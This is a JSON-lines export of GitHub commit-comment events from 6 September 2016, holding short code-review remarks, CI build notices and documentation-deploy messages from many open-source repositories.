{"id":"4520621107","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909185,"position":1,"line":1,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/OcppMessageEncryptor.scala","commit_id":"e678fe1480a07082d56a88a114a7e67dd808f680","created_at":"2016-09-06T11:00:11Z","updated_at":"2016-09-06T11:00:11Z","body":"Should we duplicate this class in both CN and ocpp?"}},"created_at":"2016-09-06T11:00:11Z"}
{"id":"4520621569","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18909187,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-06T11:00:17Z","updated_at":"2016-09-06T11:00:17Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.159](http://build.clear-measure.com/viewLog.html?buildId=10375&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-06T11:00:17Z"}
{"id":"4520622090","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"voorhoede/vh-semantic-release-cli"},"payload":{"comment":{"id":18909190,"position":4,"line":4,"path":"README.md","commit_id":"897f55fae114660919d8050ae60c45f40a25be5b","created_at":"2016-09-06T11:00:24Z","updated_at":"2016-09-06T11:00:24Z","body":"@jpsc describe why fork exists? \"This is a fork from ... which is adapted for Node 6+.\" (correct me if reason is different)."}},"created_at":"2016-09-06T11:00:24Z"}
{"id":"4520626523","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909204,"position":13,"line":72,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/WebSocketConnection.scala","commit_id":"e678fe1480a07082d56a88a114a7e67dd808f680","created_at":"2016-09-06T11:01:19Z","updated_at":"2016-09-06T11:01:19Z","body":"Not sure if CPID we use is the same as what eNovates sends. I am now sending chargerId"}},"created_at":"2016-09-06T11:01:19Z"}
{"id":"4520629112","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2-json-api-component"},"payload":{"comment":{"id":18909209,"position":null,"line":null,"path":null,"commit_id":"ac940f3d3f3996a19b9c106e18d5343990fbdd96","created_at":"2016-09-06T11:01:54Z","updated_at":"2016-09-06T11:01:54Z","body":"Нужно внести это изменение в движок https://github.com/instantsoft/icms2/commit/1a5855879afed91bb719d1e01565da0a27ec8db6"}},"created_at":"2016-09-06T11:01:54Z"}
{"id":"4520632048","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"TheBlueMatt/bips"},"payload":{"comment":{"id":18909216,"position":9,"line":114,"path":"bip-0152.mediawiki","commit_id":"7059fd119f779cd87c4c44fa16ff98e080be5181","created_at":"2016-09-06T11:02:34Z","updated_at":"2016-09-06T11:02:34Z","body":"I guess this is included in the language below `As a node must send all sendcmpct messages which contain a novel version announcement`"}},"created_at":"2016-09-06T11:02:34Z"}
{"id":"4520632619","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18909218,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-06T11:02:42Z","updated_at":"2016-09-06T11:02:42Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.159](http://build.clear-measure.com/viewLog.html?buildId=10375&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:25"}},"created_at":"2016-09-06T11:02:42Z"}
{"id":"4520632670","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":18909219,"position":4,"line":34,"path":"CHANGES.rst","commit_id":"4b3b028139a84be7489ff34c91ecd14a99124c01","created_at":"2016-09-06T11:02:43Z","updated_at":"2016-09-06T11:02:43Z","body":"Ah, okay. We use the Zope 2.13 WSGI publisher in a project of ours, so we have to explore what these changes mean to us."}},"created_at":"2016-09-06T11:02:43Z"}
{"id":"4520635244","type":"CommitCommentEvent","actor":{"login":"denniseffing"},"repo":{"name":"instantshare/instantshare"},"payload":{"comment":{"id":18909220,"position":null,"line":null,"path":null,"commit_id":"3fea4b37ea646676deacfc64a10d2ab9a642b3c6","created_at":"2016-09-06T11:03:19Z","updated_at":"2016-09-06T11:03:19Z","body":"#17 "}},"created_at":"2016-09-06T11:03:19Z"}
{"id":"4520637846","type":"CommitCommentEvent","actor":{"login":"ttmc"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":18909224,"position":null,"line":null,"path":null,"commit_id":"06837816bb9fb7ded6f39de9479124c6802d6135","created_at":"2016-09-06T11:03:56Z","updated_at":"2016-09-06T11:03:56Z","body":"How about:\r\n```text\r\n        Also checks if the transaction already exists in the blockchain. If it\r\n        does, or it's invalid, it's deleted from the backlog immediately.\r\n```"}},"created_at":"2016-09-06T11:03:56Z"}
{"id":"4520642257","type":"CommitCommentEvent","actor":{"login":"brgillis"},"repo":{"name":"GalSim-developers/GalSim"},"payload":{"comment":{"id":18909231,"position":73,"line":338,"path":"examples/demo9.py","commit_id":"a6d982227f59e22a7add261e686c4b3579b368fb","created_at":"2016-09-06T11:04:59Z","updated_at":"2016-09-06T11:04:59Z","body":"Physically I think it makes more sense for this to be a uniform distribution, but if you want to demonstrate the use of different pdfs with DistDeviate, we can leave it as is (and perhaps just change the comment)"}},"created_at":"2016-09-06T11:04:59Z"}
{"id":"4520642449","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18909234,"position":4,"line":206,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.csproj","commit_id":"081123f7b965e260ba3a4c5367a41ae26205781a","created_at":"2016-09-06T11:05:02Z","updated_at":"2016-09-06T11:05:02Z","body":"What's copying it to the bin folder then?"}},"created_at":"2016-09-06T11:05:02Z"}
{"id":"4520643120","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18909236,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T11:05:12Z","updated_at":"2016-09-06T11:05:12Z","body":"It can see a difference, weapon switching is bit faster but not noticeable.\r\n\r\nLog states 0 now:\r\nRunning DisableNagle.js\r\n11:57:09 DisableNagle.js: 0x22f2918\r\n11:57:25 DisableNagle.js: Socket: 2444\r\n11:57:25 DisableNagle.js: Setting TCP_NODELAY: 0\r\n11:57:25 DisableNagle.js: WSAGetLastError: 0\r\n11:57:33 DisableNagle.js: Socket: 2532\r\n11:57:33 DisableNagle.js: Setting TCP_NODELAY: 0\r\n11:57:33 DisableNagle.js: WSAGetLastError: 0\r\n11:57:36 DisableNagle.js: Socket: 2536\r\n11:57:36 DisableNagle.js: Setting TCP_NODELAY: 0\r\n11:57:36 DisableNagle.js: WSAGetLastError: 0\r\n\r\nI'll restart my computer with nagle disabled, compare, and report back in a sec."}},"created_at":"2016-09-06T11:05:12Z"}
{"id":"4520646840","type":"CommitCommentEvent","actor":{"login":"hujosh"},"repo":{"name":"hujosh/signbank-feedback"},"payload":{"comment":{"id":18909243,"position":null,"line":null,"path":null,"commit_id":"7959a1f4da000222e3077647e8b30157708f60c3","created_at":"2016-09-06T11:06:07Z","updated_at":"2016-09-06T11:06:07Z","body":"hi henry, that looks like a better solution than what i have done except for one thing: how do i ensure that only one record has been added to the database? "}},"created_at":"2016-09-06T11:06:07Z"}
{"id":"4520650034","type":"CommitCommentEvent","actor":{"login":"JanGalek"},"repo":{"name":"dg/dibi"},"payload":{"comment":{"id":18909255,"position":null,"line":null,"path":null,"commit_id":"3a6dc07da8d35da658eb49c06a4837c5cfd182c8","created_at":"2016-09-06T11:06:54Z","updated_at":"2016-09-06T11:06:54Z","body":"Thanks, now I get new error, which slowed my page, I fixed it and web is faster, thank you again :) :+1: "}},"created_at":"2016-09-06T11:06:54Z"}
{"id":"4520650589","type":"CommitCommentEvent","actor":{"login":"AviS45"},"repo":{"name":"AviS45/RF"},"payload":{"comment":{"id":18909256,"position":null,"line":null,"path":null,"commit_id":"544fb04fec4cca2ba83e175a4c626237d2017f91","created_at":"2016-09-06T11:07:03Z","updated_at":"2016-09-06T11:07:03Z","body":"This is Simple RF project where the data packet is sent on button press, and if the packet is received and if it is correct then the led is Toggled"}},"created_at":"2016-09-06T11:07:03Z"}
{"id":"4520655553","type":"CommitCommentEvent","actor":{"login":"nofearnohappy"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18909272,"position":null,"line":null,"path":null,"commit_id":"7e7e3eeb472af4696a3f1a7ccf57e7806a780e4c","created_at":"2016-09-06T11:08:14Z","updated_at":"2016-09-06T11:08:14Z","body":"a little bit later"}},"created_at":"2016-09-06T11:08:14Z"}
{"id":"4520664282","type":"CommitCommentEvent","actor":{"login":"kachkaev"},"repo":{"name":"toxicFork/react-three-renderer-example"},"payload":{"comment":{"id":18909298,"position":8,"line":8,"path":"src/examples/GeometryShapes/Resources.js","commit_id":"839706564d971ebb0fc77d40dbf02a7d8de41069","created_at":"2016-09-06T11:10:16Z","updated_at":"2016-09-06T11:10:16Z","body":"Why so? How about at least `shouldComponentUpdate = PureRenderMixin.shouldComponentUpdate;`? HMR changes are not applied otherwise."}},"created_at":"2016-09-06T11:10:16Z"}
{"id":"4520667668","type":"CommitCommentEvent","actor":{"login":"mariangemarcano"},"repo":{"name":"Unity-Technologies/katana"},"payload":{"comment":{"id":18909308,"position":21,"line":192,"path":"master/buildbot/status/slave.py","commit_id":"4a636a1f5c38911ea81e2d0cbe74b4c9e0aabf78","created_at":"2016-09-06T11:11:03Z","updated_at":"2016-09-06T11:11:03Z","body":"@BarryUnity could you change it to self.master.config.slaveManagerUrl ?"}},"created_at":"2016-09-06T11:11:03Z"}
{"id":"4520672377","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18909319,"position":null,"line":null,"path":null,"commit_id":"bfad53596801dd074fb7390ec29d1b01204029b4","created_at":"2016-09-06T11:12:17Z","updated_at":"2016-09-06T11:12:17Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-06T11:12:17Z"}
{"id":"4520673747","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909321,"position":33,"line":136,"path":"compiler/frontend/src/org/jetbrains/kotlin/KtNodeTypes.java","commit_id":"6a18f41800b7c0e3a170cf698637723ca469e621","created_at":"2016-09-06T11:12:36Z","updated_at":"2016-09-06T11:12:36Z","body":"Is this actually correct? I think we should try to find an existing `CharTable` by going up the parents of `chameleon` until we find a `FileElement` and then calling its `getCharTable()` method."}},"created_at":"2016-09-06T11:12:36Z"}
{"id":"4520676269","type":"CommitCommentEvent","actor":{"login":"Minjung-Baek"},"repo":{"name":"Min-Ho-Kim/Dexter"},"payload":{"comment":{"id":18909330,"position":18,"line":298,"path":"project/dexter-core/src/java/com/samsung/sec/dexter/core/config/DexterConfig.java","commit_id":"14b4c8cc23761ad689f50ede9811045ae0812814","created_at":"2016-09-06T11:13:16Z","updated_at":"2016-09-06T11:13:16Z","body":"It need to call \"Project:Add File...\" macro in Base Project.\r\nThere is 'dexter.em' file on 'Base Project' Directory(user.home\\\\~~\\\\Projects\\\\Base),\r\nbut it is now shown the file name on 'Base Project' File list on Source Insight."}},"created_at":"2016-09-06T11:13:16Z"}
{"id":"4520678056","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909336,"position":14,"line":1034,"path":"compiler/frontend/src/org/jetbrains/kotlin/parsing/KotlinExpressionParsing.java","commit_id":"6a18f41800b7c0e3a170cf698637723ca469e621","created_at":"2016-09-06T11:13:44Z","updated_at":"2016-09-06T11:13:44Z","body":"Please add a comment for the second boolean parameter too."}},"created_at":"2016-09-06T11:13:44Z"}
{"id":"4520681311","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909344,"position":5,"line":160,"path":"compiler/frontend/src/org/jetbrains/kotlin/parsing/KotlinParsing.java","commit_id":"6a18f41800b7c0e3a170cf698637723ca469e621","created_at":"2016-09-06T11:14:30Z","updated_at":"2016-09-06T11:14:30Z","body":"Add comments for boolean parameters?"}},"created_at":"2016-09-06T11:14:30Z"}
{"id":"4520682151","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18909349,"position":null,"line":null,"path":null,"commit_id":"4c59beb5732e870e84a81451f2513eda2a2d00ff","created_at":"2016-09-06T11:14:42Z","updated_at":"2016-09-06T11:14:42Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-06T11:14:42Z"}
{"id":"4520682828","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909351,"position":38,"line":75,"path":"compiler/frontend/src/org/jetbrains/kotlin/psi/KtLambdaExpression.java","commit_id":"6a18f41800b7c0e3a170cf698637723ca469e621","created_at":"2016-09-06T11:14:52Z","updated_at":"2016-09-06T11:14:52Z","body":"Why is this needed?"}},"created_at":"2016-09-06T11:14:52Z"}
{"id":"4520687018","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18909361,"position":24,"line":84,"path":"microservices/clients/comment-client/src/main/java/org/xcolab/client/comment/CommentClient.java","commit_id":"faf258d5232029a08fb323446291a35e4aed2ca7","created_at":"2016-09-06T11:15:51Z","updated_at":"2016-09-06T11:15:51Z","body":"nice API :) "}},"created_at":"2016-09-06T11:15:51Z"}
{"id":"4520689477","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18909369,"position":22,"line":80,"path":"microservices/clients/members-client/src/main/java/org/xcolab/client/members/MembersClient.java","commit_id":"faf258d5232029a08fb323446291a35e4aed2ca7","created_at":"2016-09-06T11:16:29Z","updated_at":"2016-09-06T11:16:29Z","body":"nice"}},"created_at":"2016-09-06T11:16:29Z"}
{"id":"4520690260","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18909370,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T11:16:40Z","updated_at":"2016-09-06T11:16:40Z","body":"@atamariya Oh i see, so i misunderstood you.\r\nI agree, i saw that, but i don't have Java skill to modify @Nadahar code so i just push what i'm able to do."}},"created_at":"2016-09-06T11:16:40Z"}
{"id":"4520692052","type":"CommitCommentEvent","actor":{"login":"hannosch"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":18909375,"position":4,"line":34,"path":"CHANGES.rst","commit_id":"4b3b028139a84be7489ff34c91ecd14a99124c01","created_at":"2016-09-06T11:17:07Z","updated_at":"2016-09-06T11:17:07Z","body":"We can also discuss it at the sprint. I'm not set on one way or the other. I just think overall WSGI publisher adoption was rather low and a more traditional full-featured publisher would help get more projects on board (hint Plone), which in turn should help with the amount of developers trying to maintain Zope."}},"created_at":"2016-09-06T11:17:07Z"}
{"id":"4520692694","type":"CommitCommentEvent","actor":{"login":"NaMax66"},"repo":{"name":"NaMax66/Test1"},"payload":{"comment":{"id":18909376,"position":null,"line":null,"path":null,"commit_id":"89c70487b2633814737afa8dda3cc50b1dad7282","created_at":"2016-09-06T11:17:17Z","updated_at":"2016-09-06T11:17:17Z","body":"Коммент с портала"}},"created_at":"2016-09-06T11:17:17Z"}
{"id":"4520694437","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18909378,"position":95,"line":156,"path":"microservices/clients/members-client/src/main/java/org/xcolab/client/members/MembersClient.java","commit_id":"faf258d5232029a08fb323446291a35e4aed2ca7","created_at":"2016-09-06T11:17:41Z","updated_at":"2016-09-06T11:17:41Z","body":"I would rename the enum \"CacheRetainment\" instead of CachingStrategy to suggest that this has to do with timing. "}},"created_at":"2016-09-06T11:17:41Z"}
{"id":"4520695962","type":"CommitCommentEvent","actor":{"login":"daikumatan"},"repo":{"name":"daikumatan/openfoam-on-rescaledoe"},"payload":{"comment":{"id":18909381,"position":null,"line":null,"path":null,"commit_id":"6aece0b73544fe9e4ec714c5e5d2afe860ab2fe7","created_at":"2016-09-06T11:18:04Z","updated_at":"2016-09-06T11:18:04Z","body":"Git hub Message Test"}},"created_at":"2016-09-06T11:18:04Z"}
{"id":"4520696785","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18909382,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-06T11:18:16Z","updated_at":"2016-09-06T11:18:16Z","body":"Sp"}},"created_at":"2016-09-06T11:18:16Z"}
{"id":"4520699008","type":"CommitCommentEvent","actor":{"login":"dafuku"},"repo":{"name":"dafuku/Accordion"},"payload":{"comment":{"id":18909390,"position":null,"line":null,"path":null,"commit_id":"696836a78a123bcfb41859403e88797c0d49c266","created_at":"2016-09-06T11:18:48Z","updated_at":"2016-09-06T11:18:48Z","body":"jQuery Accordion "}},"created_at":"2016-09-06T11:18:48Z"}
{"id":"4520699366","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18909394,"position":null,"line":null,"path":null,"commit_id":"faf258d5232029a08fb323446291a35e4aed2ca7","created_at":"2016-09-06T11:18:53Z","updated_at":"2016-09-06T11:18:53Z","body":"looks good!"}},"created_at":"2016-09-06T11:18:53Z"}
{"id":"4520703183","type":"CommitCommentEvent","actor":{"login":"FICTURE7"},"repo":{"name":"FICTURE7/CoCSharp"},"payload":{"comment":{"id":18909406,"position":null,"line":null,"path":null,"commit_id":"6e4e08bcf87d0edb4682606737f74f89a469da8c","created_at":"2016-09-06T11:19:54Z","updated_at":"2016-09-06T11:19:54Z","body":";]"}},"created_at":"2016-09-06T11:19:54Z"}
{"id":"4520703488","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"engstk/android_device_oneplus_onyx"},"payload":{"comment":{"id":18909407,"position":null,"line":null,"path":null,"commit_id":"e2479c7c9ad652fe3ef8b9ff9359b0841d1f1423","created_at":"2016-09-06T11:19:58Z","updated_at":"2016-09-06T11:19:58Z","body":"Dop not merge"}},"created_at":"2016-09-06T11:19:58Z"}
{"id":"4520707272","type":"CommitCommentEvent","actor":{"login":"apinrdw"},"repo":{"name":"apinrdw/turbolinks-ios"},"payload":{"comment":{"id":18909414,"position":3,"line":3,"path":"Turbolinks/Action.swift","commit_id":"a534bf815a1a6572dfc7a4be84789da53fd97c9f","created_at":"2016-09-06T11:20:56Z","updated_at":"2016-09-06T11:20:56Z","body":"Swift String enum cant be use in Obj-C\r\nhttp://stackoverflow.com/questions/24139320/is-it-possible-to-use-swifts-enum-in-obj-c"}},"created_at":"2016-09-06T11:20:56Z"}
{"id":"4520707330","type":"CommitCommentEvent","actor":{"login":"ashokmasa"},"repo":{"name":"ashokmasa/new-sample-folder"},"payload":{"comment":{"id":18909415,"position":1,"line":1,"path":"WebPage.htm","commit_id":"7ba1ab15ee4b4fff4e50a6c6a2ac82c0a6f82fc0","created_at":"2016-09-06T11:20:57Z","updated_at":"2016-09-06T11:20:57Z","body":"This is updated Line"}},"created_at":"2016-09-06T11:20:57Z"}
{"id":"4520707501","type":"CommitCommentEvent","actor":{"login":"iperdomo"},"repo":{"name":"akvo/akvo-reflow"},"payload":{"comment":{"id":18909418,"position":12,"line":12,"path":"Dockerfile","commit_id":"eaa85cddc108873c0638a50b40b0560daf44e08b","created_at":"2016-09-06T11:20:59Z","updated_at":"2016-09-06T11:20:59Z","body":"It's easier to just set a _fixed_ name for the uberjar, than doing the `sed` trick. e.g. https://github.com/akvo/akvo-lumen/blob/develop/backend/project.clj#L32"}},"created_at":"2016-09-06T11:20:59Z"}
{"id":"4520707900","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18909420,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-06T11:21:06Z","updated_at":"2016-09-06T11:21:06Z","body":"Someone on the course discussion board posted this helpful link from stack overflow that addresses the error: [http://stackoverflow.com/questions/22408608/the-model-backing-the-applicationdbcontext-context-has-changed-since-the-datab](http://stackoverflow.com/questions/22408608/the-model-backing-the-applicationdbcontext-context-has-changed-since-the-datab)\r\nThe course discussion board can be difficult to search.... Sigh..."}},"created_at":"2016-09-06T11:21:06Z"}
{"id":"4520713736","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18909428,"position":null,"line":null,"path":null,"commit_id":"4f827ffad438bda7af125ee3320107a74d07c6b8","created_at":"2016-09-06T11:22:34Z","updated_at":"2016-09-06T11:22:34Z","body":"Yay, now I don't have to face the Quarg on my way to Mesuket!"}},"created_at":"2016-09-06T11:22:34Z"}
{"id":"4520717272","type":"CommitCommentEvent","actor":{"login":"ashokmasa"},"repo":{"name":"ashokmasa/new-sample-folder"},"payload":{"comment":{"id":18909438,"position":null,"line":null,"path":null,"commit_id":"7ba1ab15ee4b4fff4e50a6c6a2ac82c0a6f82fc0","created_at":"2016-09-06T11:23:28Z","updated_at":"2016-09-06T11:23:28Z","body":"updated line"}},"created_at":"2016-09-06T11:23:28Z"}
{"id":"4520719570","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/webtorrent"},"payload":{"comment":{"id":18909445,"position":35,"line":27,"path":"CONTRIBUTING.md","commit_id":"8d698bd5fcff9b8ff46a0fd08e52c0a2286482ef","created_at":"2016-09-06T11:24:03Z","updated_at":"2016-09-06T11:24:03Z","body":"I just started using a new contributing.md template that doesn't have the link."}},"created_at":"2016-09-06T11:24:03Z"}
{"id":"4520723293","type":"CommitCommentEvent","actor":{"login":"tomjenkinson"},"repo":{"name":"jbosstm/ci-report-generator"},"payload":{"comment":{"id":18909452,"position":null,"line":null,"path":null,"commit_id":"06ccebfb50da62f80ecc195657e6f476cf847a92","created_at":"2016-09-06T11:24:55Z","updated_at":"2016-09-06T11:24:55Z","body":"I think it is useful to include this actually"}},"created_at":"2016-09-06T11:24:55Z"}
{"id":"4520725431","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18909453,"position":49,"line":580,"path":"src/Wireframe2gcode.cpp","commit_id":"492bf72ffdbd4e836bdb9b899e9ee3de05bd4dfb","created_at":"2016-09-06T11:25:27Z","updated_at":"2016-09-06T11:25:27Z","body":"Shouldn't be removed?!"}},"created_at":"2016-09-06T11:25:27Z"}
{"id":"4520726785","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909460,"position":1,"line":1,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/OcppMessageEncryptor.scala","commit_id":"bd788175617b78a1a5eef4e99220397b510f6d17","created_at":"2016-09-06T11:25:47Z","updated_at":"2016-09-06T11:25:47Z","body":"Should we duplicate this class in both CN and ocpp?\r\n"}},"created_at":"2016-09-06T11:25:47Z"}
{"id":"4520727890","type":"CommitCommentEvent","actor":{"login":"sbmpost"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18909461,"position":13,"line":72,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/WebSocketConnection.scala","commit_id":"bd788175617b78a1a5eef4e99220397b510f6d17","created_at":"2016-09-06T11:26:03Z","updated_at":"2016-09-06T11:26:03Z","body":"Not sure if CPID we use is the same as what eNovates sends. I am now sending chargerId"}},"created_at":"2016-09-06T11:26:03Z"}
{"id":"4520731151","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18909470,"position":20,"line":20,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-06T11:26:50Z","updated_at":"2016-09-06T11:26:50Z","body":"The hash is used as checksum: The MD5 checksum is generated from the downloaded file and then compared to the provided checksum to see if they are the same. The main reason for this is to verify that the downloaded file did not get corrupted while downloading. It also provides a (weak) amount of security since you can verify that the downloaded file is probably the same as the original authors posted. However, in general things like signed files are much better to verify authenticity."}},"created_at":"2016-09-06T11:26:50Z"}
{"id":"4520737616","type":"CommitCommentEvent","actor":{"login":"davyengone"},"repo":{"name":"alexlbr/react-redux"},"payload":{"comment":{"id":18909488,"position":5,"line":85,"path":"src/components/connect.js","commit_id":"56ab2d590c106eca55240150d5aede2cf54511f2","created_at":"2016-09-06T11:28:27Z","updated_at":"2016-09-06T11:28:27Z","body":"@alexlbr if you're adding semi-colon here then you should add them everywhere on this file"}},"created_at":"2016-09-06T11:28:27Z"}
{"id":"4520737635","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18909490,"position":46,"line":29,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"e52b55a03c51b22025e3972dddbf5c5fc8992e4d","created_at":"2016-09-06T11:28:27Z","updated_at":"2016-09-06T11:28:27Z","body":"In this case `begin_3` and `end_3` could validly be `00:00:10` and `00:00:40` respectively - you've _extracted_ the correct element but the begin and end times do not necessarily need to be clipped to the segment time here."}},"created_at":"2016-09-06T11:28:27Z"}
{"id":"4520737983","type":"CommitCommentEvent","actor":{"login":"u-man74"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18909493,"position":null,"line":null,"path":null,"commit_id":"9d93c07c6615fde52f9de0c096926c19793c2e0d","created_at":"2016-09-06T11:28:32Z","updated_at":"2016-09-06T11:28:32Z","body":"Yeah, definitely a good thing. Hope softlists will be added too, especially how to start roms that are not included there and some precautions that are important, i.e. starting PAL roms on a NTSC machine and vice versa. Anyway great job."}},"created_at":"2016-09-06T11:28:32Z"}
{"id":"4520739697","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"fpco/stackage-curator"},"payload":{"comment":{"id":18909501,"position":4,"line":4,"path":"ChangeLog.md","commit_id":"67484d7d9e235c2a1ea725131390f19d0f13cde6","created_at":"2016-09-06T11:28:56Z","updated_at":"2016-09-06T11:28:56Z","body":"This is only added for new snapshots—so one can fix \r\nhttps://github.com/commercialhaskell/stack/issues/2487 only for newer snapshots, not older ones."}},"created_at":"2016-09-06T11:28:56Z"}
{"id":"4520740647","type":"CommitCommentEvent","actor":{"login":"carmelm3"},"repo":{"name":"IBM-Bluemix/box-watson"},"payload":{"comment":{"id":18909504,"position":null,"line":null,"path":null,"commit_id":"de9d4b3665f7db28b8b9f7b08e40e238d2225748","created_at":"2016-09-06T11:29:08Z","updated_at":"2016-09-06T11:29:08Z","body":"Still have issues with callback URL when executing personality-box ... getting redirect_uri_mismatch when in Box.  Leaving redirect_uri blank does not seem to work ... any ideas?"}},"created_at":"2016-09-06T11:29:08Z"}
{"id":"4520742650","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18909507,"position":25,"line":23,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T11:29:34Z","updated_at":"2016-09-06T11:29:34Z","body":"CMake automatically adds `-g` (or the equivalent for MSVC) in Debug and RelWithDebugInfo configurations, so manually specifying this is unnecessary"}},"created_at":"2016-09-06T11:29:34Z"}
{"id":"4520746133","type":"CommitCommentEvent","actor":{"login":"OxLemonxO"},"repo":{"name":"UnraveledMC-Dev/UnraveledMCMod"},"payload":{"comment":{"id":18909513,"position":null,"line":null,"path":null,"commit_id":"3787853e0b3f51d81421999cb7ee6fb22413b6b5","created_at":"2016-09-06T11:30:25Z","updated_at":"2016-09-06T11:30:25Z","body":"This is useless. Revert please."}},"created_at":"2016-09-06T11:30:25Z"}
